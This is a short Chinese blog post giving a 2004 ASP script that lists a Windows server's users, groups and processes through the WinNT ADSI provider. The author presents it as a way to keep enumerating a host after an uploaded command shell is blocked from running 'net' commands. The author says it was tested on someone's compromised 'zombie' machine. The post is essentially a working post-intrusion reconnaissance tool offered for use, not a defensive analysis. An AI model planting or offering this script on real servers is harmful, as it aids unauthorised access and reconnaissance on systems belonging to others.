asp查看系统用户和进程的代码

//copyright 32768 2004<br>
<%
dim obj
on error resume next
for each obj in getObject("WinNT://.")
err.clear%>
<!--<%=obj.path%>-->
<%if err then
%>系统用户(组)<%else%>系统进程<%end if%>
<%=obj.Name%>
<%if err then
else
%>(<%=obj.DisplayName%>)<%end if%>
<br>  <%=obj.path%>
<%
next
%>


有的时候服务器做了安全配置却没做到位,上传cmd后还是无法执行net命令,用这个通常可以突破.刚才在hack520的肉鸡上做了一下测试,的确有用,发布出来去年的东西

你可能感兴趣的:(.net,asp.net,asp)